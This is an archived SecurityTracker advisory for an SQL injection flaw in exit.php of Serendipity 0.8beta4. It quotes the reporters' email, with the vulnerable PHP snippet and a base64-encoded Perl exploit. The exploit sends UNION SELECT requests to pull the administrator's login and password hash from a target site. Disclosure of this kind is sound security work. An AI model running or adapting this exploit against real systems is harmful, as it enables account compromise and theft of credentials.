SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Serendipity Vendors:   s9y.org
Serendipity Input Validation Error in 'exit.php' Permits SQL Injection Attacks
SecurityTracker Alert ID:  1013699
SecurityTracker URL:  http://securitytracker.com/id/1013699
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 14 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 0.8beta4
Description:   An input validation vulnerability was reported in Serendipity. A remote user can inject SQL commands.

The 'exit.php' script does not properly validate user-supplied input in the 'url_id' and 'entry_id' parameters. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

ADZ Security Team reported this vulnerability.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.s9y.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  serendipity SQL Injection vulnerability


This is a multi-part message in MIME format.

--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

ADZ Security Team
===================
Info

Program: serentdipity web blog system
Version: 0.8beta4
Module:  exit.php
Bug type: SQL Injection
Vendor site: http://www.s9y.org/
Vendor Informed: Yes
===================
Bug Info

// code start
//.......
$links = serendipity_db_query("SELECT link FROM
{$serendipity['dbPrefix']}references WHERE id = {$_GET['url_id']} AND
entry_id = {$_GET['entry_id']}", true);
//.......
// no checks here...
//.......
 if (is_array($links) && isset($links['link'])) {
        // URL is valid. Track it.
        $url = $links['link'];
 }
//......
if (serendipity_isResponseClean($url)) {
    header('HTTP/1.0 301 Moved Permanently');
    header('Location: ' . $url);
}

//......
// code end

As we see, if we insert some "bad" sql-code into $_GET['url_id'] or
$_GET['entry_id'], server returns in header "Location: xxxx", where is
possible to be an account login/passwd hash :)
Sorry my english :)

Exploit/PoC:
See exploit in attached adz_serendipity.pl

===================
Contact

ADZ Security Team
URL: http://adz.void.ru/
IRC: #adz @ QuakeNet
MAIL: kre0n@mail.ru, adz.kreon@gmail.com (for non-russian users)



--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.
Content-Type: application/octet-stream;
 name="adz_serendipity.pl"
Content-Disposition: attachment;
 filename="adz_serendipity.pl"
Content-Transfer-Encoding: base64

IyEvdXNyL2Jpbi9wZXJsCiMgU2VyZW5kaXBpdHkgMC44YmV0YTQgZXhpdC5waHAgU1FMIEluamVj
dGlvbiBleHBsb2l0CiMgKGMpIEFEWiBTZWN1cml0eSBUZWFtIDIwMDQtMjAwNQojIChjKSBrcmVv
biAyMDA1CiMgaHR0cDovL2Fkei52b2lkLnJ1LwojIGtyZTBuQG1haWwucnUKIyBQdWJsaWMgOikK
CnByaW50ICJcblxuIjsKcHJpbnQgIiMgU2VyZW5kaXBpdHkgMC44YmV0YTQgZXhpdC5waHAgU1FM
IEluamVjdGlvbiBleHBsb2l0XG4iOwpwcmludCAiIyAoQykgQURaIFNlY3VyaXR5IFRlYW0gMjAw
NC0yMDA1XG4iOwpwcmludCAiIyAoQykga3Jlb24gMjAwNVxuIjsKCnVzZSBJTzo6U29ja2V0Owp1
c2UgR2V0b3B0OjpTdGQ7CgpnZXRvcHQoImg6ZDpwOnQ6Iik7Cgokb3B0X3AgfHw9IDgwOwokb3B0
X2QgfHw9ICIvIjsKJG9wdF90IHx8PSAic2VyZW5kaXBpdHlfIjsKCmlmKCEkb3B0X2gpIHsKICAg
IGRpZSgiIyBVc2FnZTogJDAgLWggPGhvc3Q+IFstZCA8ZGlyPl0gWy1wIDxwb3J0Pl0gWy10IHRh
YmxlX3ByZWZpeF1cbiIpOwp9Cgokc3FscGFzcyA9ICI/ZW50cnlfaWQ9MSZ1cmxfaWQ9MSUyMFVO
SU9OJTIwU0VMRUNUJTIwcGFzc3dvcmQlMjBGUk9NJTIwIi4kb3B0X3QuImF1dGhvcnMlMjBXSEVS
RSUyMHVzZXJsZXZlbD0yNTUvKiI7CiRzcWxsb2dpbiA9ICI/ZW50cnlfaWQ9MSZ1cmxfaWQ9MSUy
MFVOSU9OJTIwU0VMRUNUJTIwdXNlcm5hbWUlMjBGUk9NJTIwIi4kb3B0X3QuImF1dGhvcnMlMjBX
SEVSRSUyMHVzZXJsZXZlbD0yNTUvKiI7CgpwcmludCAiIyBIb3N0OiAkb3B0X2hcbiI7CnByaW50
ICIjIERpcjogJG9wdF9kXG4iOwpwcmludCAiIyBQb3J0OiAkb3B0X3BcbiI7CnByaW50ICIjIFBy
ZWZpeDogJG9wdF90XG4iOwoKJFExID0gIkdFVCAiLiRvcHRfZC4iL2V4aXQucGhwIi4kc3FsbG9n
aW4uIiBIVFRQLzEuMFxuIjsKJFExIC49ICJIb3N0OiAiLiRvcHRfaC4iXG5cbiI7CgokUTIgPSAi
R0VUICIuJG9wdF9kLiIvZXhpdC5waHAiLiRzcWxwYXNzLiIgSFRUUC8xLjBcbiI7CiRRMiAuPSAi
SG9zdDogIi4kb3B0X2guIlxuXG4iOwoKJHMgPSBJTzo6U29ja2V0OjpJTkVULT5uZXcoUHJvdG8g
PT4gJ3RjcCcsIFBlZXJBZGRyID0+ICRvcHRfaCwgUGVlclBvcnQgPT4gJG9wdF9wKSBvciBkaWUo
IkNhbid0IGNvbm5lY3QhIik7CiRzLT5zZW5kKCRRMSk7CiRzLT5yZWN2KCR0eHQsIDEwMjQpOwpp
ZigkdHh0ID1+IG0vbG9jYXRpb246IChcUyspL2kpIHsKICAgICRsb2dpbiA9ICAkMTsKfQoKJHMg
PSBJTzo6U29ja2V0OjpJTkVULT5uZXcoUHJvdG89Pid0Y3AnLCBQZWVyQWRkciA9PiAkb3B0X2gs
IFBlZXJQb3J0ID0+ICRvcHRfcCkgb3IgZGllKCJDYW4ndCBjb25uZWN0ISIpOwokcy0+c2VuZCgk
UTIpOwokcy0+cmVjdigkdHh0LCAxMDI0KTsKaWYoJHR4dCA9fiBtL2xvY2F0aW9uOiAoXFMrKS9p
KSB7CiAgICAkcGFzcyA9ICQxOwp9CmlmKCEkbG9naW4gfHwgISRwYXNzIHx8ICRsb2dpbiA9fiBt
L2h0dHA6XC9cLy9pIHx8ICRwYXNzID1+IG0vaHR0cDpcL1wvL2kpIHsKICAgIHByaW50ICIjIEZh
aWxlZCA6KFxuIjsKICAgIGV4aXQ7Cn0KCnByaW50ICIjIFN1Y2NlZWQgOilcbiI7CnByaW50ICIj
IExvZ2luOiAkbG9naW5cbiI7CnByaW50ICIjIFBhc3MgSGFzaDogJHBhc3NcbiI7CnByaW50ICJc
biI7

--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC